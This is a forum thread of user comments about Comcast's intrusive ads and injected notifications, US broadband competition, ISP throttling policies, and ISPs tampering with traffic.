What is there to say? This is an incredibly obnoxious theft of attention. Comcast has perfected the art of harassing its customers with unwelcome noise for what must be marginal profit. I know someone with a Comcast cable box whose channel menu forces the viewer to pass over a banner advertisement after every fourth channel. This combined with the horrible rubbery buttons on the remote means that to browse through twenty channel titles takes perhaps as many seconds. Add to this "actionable" banner advertisements displayed over the content and seemingly endless commercial "breaks" and I find it essentially unusable. On top of it all, I understand that people pay over a thousand dollars a year for this service. Comcast's flagrant disregard for customer satisfaction, or even their basic human dignity, is a striking testament to the failure of regulators to ensure adequate competition in this space.
FiOS does the same thing with its cable box. I'm not sure it's every fourth channel, but doing anything with the cable guide often involves dismissing an interstitial ad on the way to whatever you were trying to do, made all the more annoying by the slow UI.
TV service just keeps getting more and more obnoxious. I only got it because it came with 2 years of free HBO and was cheaper than Internet alone at the tier I wanted. There's hardly any reason to watch cable TV any more. (I know, sports. Not really my thing, but I get that a lot of people want to watch live sports)
I can't speak for Comcast, but my FiOS boxes allow for you to turn off the initial launch/guide ad popups in your box settings. It's not the easiest of settings to find, but it's there (and enabled by default, of course). Call support (fast and helpful...not kidding) or search the online support area, which is how I figured it out and was easy to find the answer. The only persistent ad, I believe, is a single ad bar (annoying, but doesn't obstruct view) at the bottom of the channel guide, used mostly (from what I recall...I don't pay much attention to it) for promos of new on-demand releases. Love LOVE FiOS.
If this is how Comcast treats its customers, I wonder why anyone would want to pay them to be their customer. Especially a thousand dollars a years. Is this because there's no real competition in the US?
In many areas of the country, the cable companies basically have localized monopolies on high speed internet. They claim they have competition in DSL and satellite (!!!) but these technologies just can't compete on speed in this day and age, leaving cable as the only viable alternative. From what I gather, this is one of the reasons why Google started Google Fiber.
Interesting. Over here, providers are offering VDSL2, advertised as 100/100Mbit. Given my experience with DSL, that probably means about half that for the average user who is 2-3km from the DSLAM box. That's still pretty respectable. Is noone offering modern DSL in the US?
Nope, sadly not. Even in San Francisco (which is pretty sad for being the heart of tech) it is cable or legacy DSL. If you are at a building that has an exclusivity agreement with AT&T, you might even end up paying them $50+ a month for 28mbit fiber. (yes, fiber terminates at my door but that's the max speed they offer)
Well, there is Webpass for some in SF. I pay $60/mo for 100mbits up & down, and some buildings go up to 500mbits. No contracts, and I just hook up to an ethernet jack in my apartment. It is a local startup that is expanding elsewhere.
Webpass is the best Internet service ever. I signed up as soon as our building got it, it was $50/mo then for the 100Mbs. Definitely worth it if you have the opportunity to live in a building that has it. Really straightforward website, billing, and setup. It looks like they're expanding to some other cities. I wish them luck.
I love WebPass, and I used them exclusively in my previous apartment but this new building has this silly exclusivity agreement and Comcast can't make installations on this building as they somehow managed to make this residential building show up as a business address on Comcast's website.
I could get Sonic Fusion FTTN but that's just rebranded AT&T, and peaks at 28mbits. I get better LTE speeds than that.
I tried to bring in MonkeyBrains but the building administration refused, saying they would have to drill into load-bearing columns. Just an excuse.
To be fair, there is sonic does offer vdsl2 in many parts of the city, over 100Mbit down, albeit a bit less up. There's also webpass for larger buildings which offers almost a gigabit during non-peak times. So SF isn't as dire as you make it sound, though I agree it's behind many other cities.
What?! In Cincinnati I had CincyBell Fibre about three years ago. I think I paid around $60 ~ $70. I don't remember the advertised speed, but it was crazy super fast.
It varies. If you are in an area with actual competition, they try harder. Where I live, it's crappy TWC 20/5 or so for $60 a month, or a selection of DSL providers offering everything from 5/1 to 0.5 megabits per second for around $20 a month. Seriously, there is an ISP offering a 0.5 Mbps DSL for $20 a month, oh, and it bursts to 1 Mbps...
VDSL2+, which is rolling out next year, is even supposed to handle 500/200 – in some areas T-Online has been testing it, and supposedly it works (but it means you have to be less than 100m from the box).
I live in a small town in Georgia and literally my only internet access options are Comcast and AT&T. AT&T's service here is fairly slow compared to Comcast's offerings, and since I work from home remote for a company based in Florida I have to choose the fastest options available to me, and that's Comcast. I would love to have more options, but I just don't.
I only pay for internet access, I don't use their cable TV or telephone offerings. Internet alone is about $80/month. I just ran a speed test and I get 14.1Mbps down & 8.6Mbps up. I forget which speed tier I'm paying for, but I know I'm paying for much more than that! Ugh...
Same thing in my big town -- Chicago. Some parts of Chicago you get RCN competing, which is amazing. They have 100mb plans for $40 a month. But for most people, myself included, you pay $80/mo for "50mb" internet that really runs at about 20mb 80% of the time, 2-3mb 15% of the time, and totally not working at all 5% of the time.
Fellow Chicagoan here: In the suburbs the options are fewer, but the functional speeds are better - at least for Comcast delivered over coax. I get an average of about 120/15 for $80/mo at home and about the same speed at our suburban office for roughly double that price (business class).
Also in Chicago, RCN was amazing. Now stuck in Comcast hell since they're not over in Logan Square. And the service starts shitting out every night around 7:30pm. Assuming they don't have enough cards in the box on the block.
In my different area of that small town, I pay $40 for 75 mbit, that actually gives me 95mbit (even at 7:00pm). And is rock solid. I don't mean to sound like a shill but I think "most people" is an incredible stretch.
Yeah, you're totally right. I just went to Comcast's website and it seems like we're basically just getting shafted. I wonder if they adjusted their prices now that RCN is selling 105mbps internet for ~$40-50/mo
Get their business plan. I always get exactly my paid for rate, and they claim business plan speeds are the same everywhere they provide service. you save money on land living in a small town, spend some of the savings on bandwidth... Or expense it to your company. Cheaper than office space in florida. Or try calling them, maybe there is a configuration issue with the router. What is the advertised rate ? You should be getting that speed.
You're a bit naive there. Business plans are not magical in any way. In fact, the past week we seem to be having a lot more issues with our business plan on Comcast than I am with my personal plan at home which seems to drop the connection roughly every other hour.
Still, Comcast shares their internet between customers in your area. If you're the only customer in your area, you can certainly get what you're paying for. If you're not, the best you can hope for is 1/4 of your promised connection speed during peak hours. It is something that Comcast has been doing for years, but it allows them to advertise higher speeds for lower prices than AT&T and people believe them because not everyone is familiar with the fine print.
- I can usually get directly to someone clued on the phone, who doesn't make me jump through hoops or silly scripts to debug a problem; they realize I've already done everything possible on my end already before calling (spent years working for ISPs).
- No blocked ports, I host my own server and do my own email, web hosting, etc. Comcast even provides reverse dns for my five static IPs.
- No data caps. In fact, they don't even measure usage for business accounts.
Other than when I had a physical problem (short in the line from the pole to my house), I've always gotten the speeds that I pay for - in this case 50Mbps down, 10Mbps up.
Disadvantages to business class:
- I pay $150/month for 50/10 and five statics.
- It's Comcast.
I was an ATT UVerse customer (standard, not business) before switching to Comcast Business about 4-5 years ago, but their max speed offering was only around 18Mbps down, and their "business class" service required the same craptastic 2Wire gateway and static IPs required 1-to-1 NAT through that gateway... No thanks.
While I have no direct experience with the business side of Comcast business customer support, I noted that when we reported an issue yesterday at work, it took them over 6 hours to fix it at which point they might as well not have bothered. The operating hours were over.
- Don't care about blocked ports. I don't personally host anything, our company also has a separate hosting service.
- I'm sorry, but... data caps? Is this a joke? In this day and age of services like Netflix and digital content distribution like Steam there's a place for data caps?
- $150/month is a ridiculous cost to put on a guaranteed 50/10 line. Don't care about the static IPs personally as I don't host anything.
- Comcast, right.... you hit it on the nail there, it looks like. My experience with their customer service so far has been horrible. I'm usually empathetic when talking with technical support as I used to do the same job myself, but there's empathy and then there's people trying to intentionally annoy. So far I've felt like bashing my head against the wall after just three sentences from Comcast tech support. And they claim they spend millions on customer satisfaction? Please.
I was an UVerse customer too. I had only one issue with them for the two years I was their customer and I'm seriously considering going back. Better have a slower connection I can rely on than having a 'blazing fast' connection that craps out every 5 minutes.
ATT business plan here... I have no issues only 20Mbit down and 2Mbit up but when I call customer service I have someone on site to fix things in 3 hrs or less
I wont ever use Comcast again... I had to get the local govt involved to get them to stop billing me for a place I hadnt lived in for 6 months. ( yes there is an agency here to deal with them they are that shitty )
The smaller speed with usable internet speeds and decent customer service is worth it.
Yeah, I'm definitely reconsidering ATT. I have coworkers that swear by Comcast and how great they are but my experience has been flaky at best. I work from home regularly, so I need my connection to be stable. I also do a fair bit of online gaming which also requires a stable connection.
It kind of tends to hurt not just me, but a fair bit of other people in the process when I, as a raid leader for our guild, cannot maintain a stable connection and get dropped several times over a 2-hour period. Never had those issues on my ATT connection and I've only had a single issue where a tree had fallen and severed a cable during 2 years of being their customer.
I wanted to start streaming our raids which was also the main reason to try the switch, but if it comes at the cost of being unable to take part in them, I might as well not bother.
Similar experience: our older house had AT&T - only 7.5 Mbit/s or so, but it pretty much never went down; our newer house has Comcast - supposed to be 30 Mbit/s, but often goes wonky or out.
It's a tough call: go 1/4 speed at 1/2 the price, reliably, or try to go 4 times faster at "only" twice the price (appx), but gamble from day to day :-(
Good to have another data point. I have not had issues in a year. I routinely download at 10 megabytes per second reading ct scans. If I wasnt getting what I was paying for, I would cancel the service and drive into work to read my cases. I am in a residential non techy area, I don't know if that helps.
I'm sorry, that sounds brutal. I live in Brooklyn and thankfully there is competition from TWC, RCN and Fios here. I have TWC cable at 300 megs down and about 50 up for about $60 a month. The cable television is still horrible and an enormous rip off.
What are your options for satellite internet? The pricing these days seems very competitive, and although latency is (much) higher it should be ideal for the vast majority of use cases.
Latency is pretty important for browsing the web. No matter how much bandwidth you have, making every request take two round-trips to geosync is going to make the connection feel very slow.
If low Earth orbit broadband internet ever happens, that could potentially be an excellent choice. But with the current offerings, it's always going to be the absolute last resort.
It looks like they charge the same price for ~1/10 the speed and 1/20 the transfer (Does Comcast still have a 300 GB limit? That compares favorably to 10.)
Nobody really wants to be a Comcast customer. Comcast thrives because they're mostly the only choice or the less bad choice of two.
I was a "happy" Comcast customer for years. I was in a condo where the choices were Comcast or Verizon DSL. Maybe. I called Verizon to see what they had to offer and they didn't know if I could get their DSL service or not. The best they could do was to place an order and see if it worked. Really!
Even if I could get service from them, their offer was 1.5Mbps for something like $50/month. Completely ridiculous.
It was like this when I moved out about three years ago, and as far as I know it's still like that today.
I wouldn't say there's no competition per se, but some areas are limited based on who has lines out there. For example, the area I live in at Augusta only offers Wow! as a cable provider; over priced reseller. But, I was fortunate enough to land a decent contract- more channels than Wow! and for 1/4 the price- with Dish. Satellite vs. Cable, but I'm willing to take that trade off for a better price point. Plus there's always NetFlix/Hulu.
To give you an idea, my internet options are in my area:
-Comcast (up to 100MB/s)
-Century Link DSL (up to 10MB/s)
-3G/4G modem (up to like 3MB/s)
Then 10 minutes south of where I live, that county has deals with a local ISP who behaves exactly like Comcast, but with terrible pricing and lower caps. Also no realistic alternatives.
While I could stomach the speeds of DSL (with some effort), I can't stomach the price. I'd end up paying just as much as comcast for much lower speeds. I really don't have a choice.
Yes. Many markets have literally one option. My options for internet are comcast, or satellite probably? So really my only high speed option is comcast. I don't even think I can get DSL. I think a lot of markets the monopoly is even being protected by law.
It's like that in a lot of places. I live in extremely central Berlin and cannot find a provider that can deliver above 25mbps for less than hundreds per month.
It is a real shame that anything over 5-7mbps is considered "fast enough" by the vast majority of consumers.
Don't like ATT either, but at least their service seems to be much more stable. I haven't had to speak with an AT&T customer support rep in over a year. Comcast, I've been doing their trial service run for two weeks now and I've already had to deal with their customer support 6+ times, 2 of which were during the installation. I think I'll probably just end up canceling before my month is up and going back to ATT. At least I knew I could rely on my connection to not crap out at random.
"I know someone with a Comcast cable box whose channel menu forces the viewer to pass over a banner advertisement after every fourth channel. This combined with the horrible rubbery buttons on the remote means that to browse through twenty channel titles takes perhaps as many seconds."
How weird is it that the equipment is still so slow? I mean, in 2005 I was grumpy about how slow cable TV gear is. Now it's 2015 and seems like it's exactly the same, whenever I see it.
What is so hard about using processors with clock speeds measured in megahertz and not kilohertz nowadays? I swear, Comcast is probably paying extra to some supplier holding the last supply of their specialized MegaSlowz chips with the SuperProprietaryFeature that you Can't Reimplement Anywhere Else.
What is so hard about using processors with clock speeds measured in megahertz and not kilohertz nowadays?
What's funny (maybe not ha-ha funny, but anyway) is that the provided equipment is usually energy in-efficient as well. Even while "off".
I'm not paying for cable now, and don't plan to in the future either. There's too much crap I don't want to watch, and I don't want to be stuck with their idea of a DVR either. And its too expensive.
Plus you can only get it (at least in my area) if you subscribe to extra services that I don't need like VOIP. CableCard could've been a viable alternative and spurred a market for DIY and third party cable tuner/decryptors but it was poorly implemented and support from cable providers is typically awful so for most people it's just not worth it.
I came close to ordering a Ceton CableCard tuner card several times so I could stick a small form factor PC in the entertainment system and get the nice setup I used to have before they killed off all of the unencrypted digital QAM channels. Unfortunately, the standard is so encumbered that hardly any software can support CableCard (one popular option was the now-deprecated Windows Media Center).
Back when QAM still came through unencrypted, I could pay for cable and hook it up to my cheapo Hauppauge card and use WMC as a great program guide and DVR setup. Even back in the Win Vista days it was vastly superior to anything on a cable box. Then they moved everything to encrypted and my tuner got repurposed for watching OTA stuff on my PC.
Now I just pay for cable/internet but watch everything streaming on legit sites or torrents. Yeah, I know...but it works better and I'm still paying for it so even if it's not legal, I don't feel that it's immoral.
My HTPC is still running Windows 7 only for Windows Media Center (using a HDHomerun Prime decoder box and CableCard). Once the program guide information is no longer updated or Microsoft somehow forces me to get rid of Windows 7, I will in turn get rid of cable TV.
The only reason I still have it is for basketball, but there are an increasing number of services (legal or otherwise) by which I can get all of that streaming online, so I may end up cancelling even sooner if given an excuse to do so (like if service goes down or they decide to jack prices again).
YMMV, but I also have TV service (U-Verse) only for basketball, and it saves me a ton of money to turn it off/sign up twice a year. Since it's only 5-6 months of the year (college basketball), I always get the "new customer" rate, and often there are enticements like gift cards. Something to consider.
When I had U-Verse I would call every 3 months and say I was cancelling. Then they would give me whatever latest "new customer offers" were currently available.
After 3 months those offers expired, I'd get a high dollar bill in the mail, so I'd call again... Wash rinse, repeat. I know multiple other people who did the same thing.
Now I only have data with TWC and receive letters 2-3 times a month from to tell me all about the great TV plans they are offering.
That's the number one reason I bought one of these HD Homerun cable tuner boxes[1]. Once I have a VLC playlist setup with the stream urls to each channel, switching channels is almost as fast as in the old days of analog cable TVs.
Maybe another 4 hours of work got me a little web application that shows the TV guide information pulled from an API, and is hooked in with the VLC web interface to switch channels with a click.
> Comcast's flagrant disregard for customer satisfaction, or even their basic human dignity, is a striking testament to the failure of regulators to ensure adequate competition in this space.
I'd argue that government regulations have done nothing in this space but reinforce coercive monopolies. I think you're taking the wrong approach, we need to deregulate this space and allow real competition to thrive.
Except for Comcast, at&t, and time warner, who have been getting massive subsidies to improve infrastructure to far beyond what it is today. I think the case could be made that this prohibits new players from entering.
To be fair the "X1" has a much better UI/UX and digital buttons. Plus the voice search (you talk into the remote) works exceptionally well. There is no lag. I might say I actually like it. I was shocked that it came from comcast.
They actually have some comcast lab product where you can play games using your smartphone as the controller. I think it's beta but it wasn't that bad when I tried NBA Jam.
Source: comcast is my only internet option so I bundle.
Actually using a Comcast cable box to watch things in 2015. I can't understand it. An Apple TV with a netflix and hulu account get you 95% of the way, with 100X better of a user experience.
Or if you don't have $100 to spare, you can always connect your laptop to your tv.
Will it solve wanting to see live sports and all the "good morning" shows I watch while prepping to go to work and do I get the new episodes of shows on their release day?
For sports it looks like there are some online, subscription type options. Still, I'd say that sports and morning shows would fall under the 5% not covered, but if those are super important to you then I could see that being an issue.
Hulu is pretty good about getting new shows up pretty quickly, usually the day after. I'm usually able to live with not seeing a show the minute it airs.
Comcast is on my list today for a different reason. We have Comcast Business Class service at one of our FL locations.
Tuesday we could not access VNC nor our remote database services from that location. All port 80 traffic was fine. I had one of the staff call, wait on hold for an hours.
Just as I suspected Comcast had implemented port blocking on a high priced business account. It took the guy a second to release it. It put our company down for two to three hours.
Also the speed of Comcast service drops to 15-20% of advertised from 2:30 to 5 PM when kids arrive home from school.
Once the contract is up we are moving the service to someone who understands "business class"
The same thing happened to us recently. I can't remember which port they blocked, but it took out rubygems, bitbucket and github in all of Utah.
It took a while before someone finally figured it out and word spread on Twitter. I'm sure hundreds of thousands if not millions of dollars of productivity were lost that day.
This change is also required when sbux moves to using Google internet. I was scratching my head when it worked one week and then stopped working the next.
And that is the root of the problem. Normally when a business has the kind of terrible customer service and can't-be-bothered attitude, I just take my business elsewhere. But in the last 15 years I've never had a real choice what to use for Internet service. A couple of places I've lived I've had one additional choice that was even worse. Lack of choice and diversity in Internet providers is the problem here. I'm not sure what the root of that problem is, but I suspect it's governmental corruption and lobbying to maintain status quo.
The root of the problem is the legal difference between POTS (Plain Old Telephone Service), which has been around a long time, and broadband, which came much later and had the POTS environment as an example of what to avoid (from the POV of Comcast and their ilk).
The old dialup ISPs were allowed to resell internet service on the local provider's POTS lines. There was quite a lot of competition, and the service was generally excellent, even generally better than the carrier's.
There is no requirement for broadband providers like Comcast to allow resellers. The barrier to entry for laying other broadband lines is huge; Google is one of the few who can do it. So unless there's a quantum leap in wireless to the curb, there will be no meaningful competition to amoral corporations like Comcast; we're stuck and it will continue to suck.
The real root of the problem is lack of regulation. A scarce resource like the last mile copper and cable, is owned by the oligopoly of Comcast, AT&T and a few others. This constitutes in essence a monopoly, which are illegal for obvious reasons and led to the breakup of the old AT&T. Other countries have a last-mile sharing requirement, like for example in Germany. This provides at least a modicum of competition and consumer choice in the ISP market.
[EDIT] Corrected wrong assumption that old AT&T was government owned.
Yep. I have the choice of Comcast or AT&T, the latter of which only recently got competitive in the speed category. I was with AT&T for many years, before my current 10+ year stint with Comcast. They are both horrible on customer service and IT (managing their own infrastructure). It's really a toss up as to which is worse.
I know Google fiber will never come to the East Bay (SF area). It would be so nice to have, though.
It's really a mix of over-regulation and under-regulation, with a lot of regulatory capture. In this case the monopolies are not illegal, they're actually protected by regulation.
The root problem is that telecommunications is similar to utilities in that it is a natural monopoly.
Basically imagine if someone owned the only bridge into San Francisco. They could charge whatever people were willing to pay. But you would think if they charge too much money or scream obscenities at everyone who drives through, then someone could build another bridge and steal their customers. The problem is that if anyone builds another bridge the bridge owner could stop screaming obscenities and lower his prices. Then the second bridge could not make the return on capital. The prospective business owner and current owner know this so the status quo of one expensive and crappy bridge
remains.
Unfortunately I think this is the experience of most people in the U.S. At least in my adult life, the choice has mostly been between AT&T and Comcast. I was lucky to get 100Mbs for $50/mo for a while (obviously with a small ISP), but that was just a particular building that happened to have a point-to-point wireless setup on the roof. Now things are worse... I happen to live somewhere that actually has fiber in the ground (thanks to some federal grant the city received) but there is no service provider that uses it! I would be happy to ditch AT&T/Comcast for life if it were possible.
With all due respect, your customer service policy should be based on doing the right thing regardless of the forum, as opposed to simply responding to those who have an audience.
The data caps you've recently put into place in my market are going to effectively double my account price per month. I look forward to the day that I have other choices.
No one is blaming individual employees. Quite the opposite, in fact—they're blaming the organization for failing to address issues unless the right individual is reached.
That's been my experience, as well. In two instances (one business class, one residential), I had issues getting their construction department to actually do the work they promised until I was able to get through to the escalation department—once via Twitter, once (IIRC) on dslreports.com back when the Comcast direct forum was monitored. Once the escalation department was engaged, things moved very quickly, with them calling me almost daily with status updates.
There are clearly individuals at Comcast who care about customer service. Unfortunately, they don't seem to be the ones in charge of organizational policies and processes.
Agreed. I recently decided to give Comcast another go because my current provider has some horribly bad upstream speeds, but even with brand new service, I seem to be having issues where my connection drops 4-5 times a day. It is not too big a deal when you're trying to work from home, but it can be a massive pain in the neck when you're trying to play anything online. I've been trying to resolve this issue with their customer support but I've gotten nowhere so far and feel like I'll probably just go ahead and cancel out of the contract before my first month is up.
They do advertise that they spend millions of dollars on improving their customer support, but I've yet to see anything happen on their end. Amusingly, our Comcast business contract at work has at least a couple of issues every week, too. We only don't notice them if they are to happen over the weekend, but when CRON jobs that require internet connection haven't run over the weekend, it's easy to figure out who needs blamed.
I agree with you. I'm troubled though by this new era of customer service where the focus is on having a team of people who monitor social media for the loudest complaints and devote resources to solving those out of fear of bad PR.
I do my best (customer support is not my day job) - if you are having issues I'd encourage you to try out the tool I helped build here: https://speedexperience.xfinity.com/
Some listing of what the actual issue is would be kinda useful, even if you shove it in a collapsible div to hide it away.
I (and most people) are more likely to rage-quit and go do something else than try to navigate three layers of outsourced customer service that is designed and optimized to deflect people, waste their time, and only if they are sufficiently insistent, and border-line belligerent, maybe give them an answer more involved than "unplug your modem and plug it back in"
Yes, all of the wifi stuff we add in the future will be only possible on comcast-provided wireless gateways (XB2/XB3). We have some other nifty ideas that would use our gateways too. Most of the existing stuff I mentioned is not specific to comcast-provided devices, or wireless gateways.
At least one employee would be to blame, right? Comcast's network hasn't become sentient, and isn't actively rebelling against human businesses by shutting down random ports. At some point, someone either made an explicit decision to do this, or decided to skimp on training.
It could also be an endemic culture problem, where lots of people skimp on lots of tiny things to the point that the final performance goes down the drain. No one to blame, but everyone to blame.
> I look forward to the day that I have other choices.
Same here. They are very aware that we have no other choices. They will continue provide the least amount of service for the greatest cost until this changes.
The week after google fiber arrived in my neighborhood, my cable provider "spontaneously" decided to double my connection speed for the same price, "because we care about our customers and want them to have the best experience possible."
I had Comcast when I lived in Chicago. They basically run that city. You can't get any decent internet anywhere else. All the other providers for some reason in the city, didn't cover any neighborhood I was in.
The biggest thing I liked, moving back to Iowa was decent internet provider.
>For a CMTS port to enter the Near Congestion State, traffic flowing to or from that CMTS port must exceed a specified level (the "Port Utilization Threshold") for a specific period of time (the "Port Utilization Duration").
>Given our experience as described above, we determined that a starting point for the upstream Port Utilization Threshold should be 70 percent and the downstream Port Utilization Threshold should be 80 percent. For the Port Utilization Duration, we determined that the starting point should be approximately 15 minutes
>Thus, over any 15-minute period, if an average of more than 70 percent of a port's upstream bandwidth capacity or more than 80 percent of a port's downstream bandwidth capacity is utilized, that port is determined to be in a Near Congestion State.
>For a user to enter an Extended High Consumption State, he or she must consume greater than a certain percentage of his or her provisioned upstream or downstream bandwidth(the "User Consumption Threshold") for a specific length of time (the "User Consumption Duration").
>we have determined that the appropriate starting point for the User Consumption Threshold is 70 percent of a subscriber's provisioned upstream or downstream bandwidth, and that the appropriate starting point for the User Consumption Duration is 15 minutes
> A user's traffic is released from a BE state when the user's bandwidth consumption drops below 50 percent of his or her provisioned upstream or downstream bandwidth for a period of approximately 15 minutes.
hmm, actually i don't think i caught how much your speeds are actually reduced.
Its throttled until you've used less than 50% of what you pay for for at least 15 minutes.
That threshold is so low specifically so that a line doesn't end up cycling between throttled and not every interval if its 79% once then 81% the next, etc.
It seems obvious to me that Comcast et al are vastly overselling beyond their capacity.
They then market these strategies as methods to ensure quality to their customers, when their customers bought a service that was misadvertised as having enough capacity for them in the first place.
Just like airlines - they sell more tickets than they have seats, because they figure they can squeeze more profit out of the people who paid for a ticket but didnt show up, then when everyone shows up, someone has to get bumped.
I believe it is that if you use more than 80% and someone else is using 60%, IF throttling occurs on the network, the person using 60% will have priority over you.
Question #1: Is the CMTS Upstream Port Utilization at an average
of OVER 70% for OVER 15 minutes?
Result #1: CMTS marked in a Near Congestion State, indicating
congestion *may* occur soon.
Action #1: Search most recent analysis timeframe (approx. 15 mins.)
of IPDR usage data.
Question #2: Are any users consuming an average of OVER 70% of
provisioned upstream bandwidth for OVER 15 minutes?
Result #2: No action taken.
Result #3: Change user's upstream traffic from Priority Best Effort
(PBE) to Best Effort (BE).
Question #3: Is the user in Best Effort (BE) consuming an average
of LESS THAN 50% of provisioned upstream bandwidth
over a period of 15 minutes?
Result #4: Change user's upstream traffic back to Priority Best
Effort (PBE) from Best Effort (BE).
What other provider choice do you have? Whoever they are, they all collude to inflict maximum pain for maximum gain - a hallmark of modern capitalism. Good luck though.
That's not my definition of modern capitalism, I call that corruption. A corruption enabled by government agencies that enforce monopolies that no consumers want to exist.
I agree that in lots of places there are franchise agreements and in others, there are specific laws that deter municipal networks.
That said, you could argue that data networks are mostly a natural monopoly because it's not feasible or efficient to roll out several redundant fiber/cable networks.
Even if there were no franchise agreements in place, very few companies (excepting ones that have other revenue streams) would roll out a second or third cable/fiber network in a city where there is already one in place. Even if you managed to split the market and get half of the potential customers, you'd need to account for the cost of digging trenches and laying cable (which cable TV companies have long since recouped). Makes it hard to stay solvent at such a disadvantage.
It's why a lot of people think the ideal situation is for a single physical network to be built and then service providers pay for access and compete on service to businesses and customers. With physical networks divorced from service providers, the company or municipality in charge of the actual cable/fiber makes their money from maintaining and improving capacity so they can sell access to more providers. Providers compete by offering the best services and customer support in order to profit and pay for more bandwidth on the physical network.
But yeah, it's more complicated (in terms of both business and networking tech) but it's an ideal that many would like to move toward.
What you describe is how the power grid where I live is handled. That's one solution I would be more interested in than these monopolies that only seem to create horrible customer service, high fees, and poor product.
But in the end, I'm not sure what's the best way to handle it. I just know that many would agree that the current methods are not optimum, and possibly detrimental.
By letting the government build and own the infrastructure, then lease the exploitation of it to private companies, and have other companies do the maintenance. This has its own challenges too, but at least the monopoly is in the hands of people who can be voted out.
This model was used regularly for rail and power networks in Europe, but these have all been privatised in the past few decades citing "cost reductions". The net result is that our infrastructure is deteriorating, consumer prices are rising way faster than inflation, and critical infrastructure is now in the hands of a few international power brokers (e.g. the Dutch national telephone grid is owned by Carlos Slim).
If that's how it came about then I would be more apt to accept that. But in the U.S., I find it doubtful any current telecommunications monopoly came to exist without government involvement. A good chunk of that upfront capital and land requirement was given away by the government for promises those companies didn't keep.
Yet, you need money from the beginning, so you are now back to issuing more bonds, and perhaps, raising capitals with venture investors. This is basically the model of the 19, 20th century railroad race. Of course the government wasn't directly building the railroad, but they were the one who gave the lands and even troops to open up the new frontiers.
This is abusive. Imagine if anyone else had access to pus you notifications by intercepting your communications. Imagine Uncle Sam interrupting your calls announcing you haven't submitted your tax returns yet. Because that's basically what's happening here.
HTTPS is good and all, but the real problem is ISPs which don't want to be nothing but a transport provider. Every IP packet I send into their network should end up at its destination, with best effort, completely unmodified, and vice-versa.
That said, in my experience datacenter and enterprise ISPs tend to be far more "pure", so if you want a truly unmolested connection a possible solution could be to use a VPN to a server that terminates in one of those.
> but the real problem is ISPs which don't want to be nothing but a transport provider.
This is very, very true. Anyone who has worked at a telco should've heard the "we don't want to be a dumb pipe" argument. The thing is: they can't be more than that! I don't want their applications, they are not very good at doing applications. I don't want their content, they don't seem to get content production at all. Even their research, it has become less and less relevant.
As a customer, I'd rather see all that money spent on efficient ways of transporting bytes, or even directly subsidizing the customer bill (so that they can support smaller ARPUs). But no; I have to pay extra to support the entertainment of their engineers, in order to get sub-optimal apps and content.
It's the other way round: the extra stuff is there as "market differentiation" in order to justify the high prices and prevent commoditisation. The problem is that if you're selling a commodity the price ends up close to the marginal cost of production. Whereas every company wants to have some unique IP they can charge monopoly rent prices for, like Apple.
Same with vendor crapware on phones and PCs. I call this stuff "value subtracted software".
Don't ISPs give up common-carrier protections for things like copyright when they interfere with the traffic? This should make them liable for contributory infringement on any copyright infringements by their customers that they don't take action against.
I like your thinking. So including ads/warnings/popups is effectively making a derivative work on material that Comcast doesn't own. They become liable for copyright infringement.
Frankly the whole "don't want to be dumb pipe" thing is a telco variant of "perpetual growth".
Frankly at one point or other every large company in every mature market has to contend with having reached their growth limit. There are only so many customers in this world for the products and services offered.
The only place that could grow forever is Wall Street, by piling derivatives upon derivatives and passing them round like hot potatoes. Everywhere else has to contend with us being on a physically finite planet.
A lot of ISPs are anything but, including business or datacenter connections.
I had to deal with one of them using transparent DNS proxies without disclosing the fact. Only found out when something broken on their end. The only way to have functional DNS is to tunnel it over another protocol because their equipment will intercept DNS queries to any server and reply with a bogus IP.
Why do you think that they won't intercept HTTPS traffic? They will just instruct user to install their root certificate. It must be illegal for them to interfere with traffic, no matter what this traffic is. Otherwise there's nothing that would stop them.
Most folks in the real world don't know or care what a root certificate is.
If their ISP posts a message telling them they have to install something to continue getting "the best internet possible" or, better yet, when the tech comes to install the modem they just do it as part of the installation service, so few people are going to even think about it, let alone know why they shouldn't want it.
Remember... we here aren't an accurate facsimile of the general population.
> However, we found that users typed the “+” operator in less than half a percent of all searches, and two thirds of the time, it was used incorrectly.
1 in 600 searches used it correctly, another 2 in 600 used it incorrectly.
Stuff like that.
Or have a look through /r/tipofmytongue for people looking for help to identify songs, tv shows, and films. You'd think they'd include details of roughly when they saw the film, or who any of the actors were (or even what other film they'd been in), and then the plot (with some details), or the name of some of the characters, any music, the genre of movie. But you frequently see people who give very vague information. I won't give examples, but it's really easy to find them.
But I do need to remember not to be a judgemental dick about it, and if I was I apologise.
I worked for a company where, as part of one product, users were giving us the user AND PASSWORD for their bank account. We had thousands of users before I left. As a programmer, I was sure that the product wasn't going to be viable... boy was I wrong.
Hah, we have a payment processor here in Germany called "Sofortüberweisung".
It works like this: When you want to pay for something you give them your login credentials to your bank account and a TAN and they send the money to the merchant for you.
The selling point of this service is that SEPA wire transfers usually take one day. But with their service the merchant gets an instant notification of money received and you can get your stuff one day earlier.
It's crazy but people use this and have no problem handling over the keys to their bank account.
>> It's crazy but people use this and have no problem handling over the keys to their bank account.
Part of the problem may be that people don't really understand where those keys are going. They put the information into their computer perhaps via keyboard. Beyond that they often don't know where it goes or where it gets stored. Perhaps they think it's stored locally in an app. For a while people didn't get the distinction between an app and a web site, but I think that's changing. People think Siri does voice recognition on their phone and freak out when you tell them all the recordings are sent to Apple and stored there.
It's crazy but people use this and have no problem handling over the keys to their bank account.
I wonder whether there's more to that story. It seems like a potentially useful payment service, but it also seems like something the banks would surely be aware of. Customers giving up their credentials like that is probably a blatant violation of the bank's normal terms of business, and asking for those credentials or failing to keep them secure seems legally risky for the payment processor as well, particularly if anything ever goes wrong. Are you sure there's no separate agreement or commercial arrangement to cover this, probably between the payment processor and the banks?
While it's against most bank TOS, that clause has been ruled uncompetitive and therefore void by courts. As far as I know there is only a single German bank (DKB) that officially cooperates and gives them API access. For the rest they use web scraping, the banks are not allowed to (intentionally) break it.
The banks don't like that payment processor and therefore just started a competitor where you only give your credentials to your bank. Hopefully it gains traction.
This is Yodlee, the USA's largest financial API for consumer products (Mint, etc), endorsed by all large banks and investment firms. They have millions of users.
It may be enough if ISPs forfeit common carrier status as soon as they "manage" data and thus adopt full responsibility for every byte going to the customer.
But I thought they didn't even want common carrier status, because they wouldn't be able to throttle your Netflix traffic if they were a common carrier.
But the argument that if they mess with the content and the traffic, they carry responsibility for it that they don't if they're just a dumb pipe, is a good one.
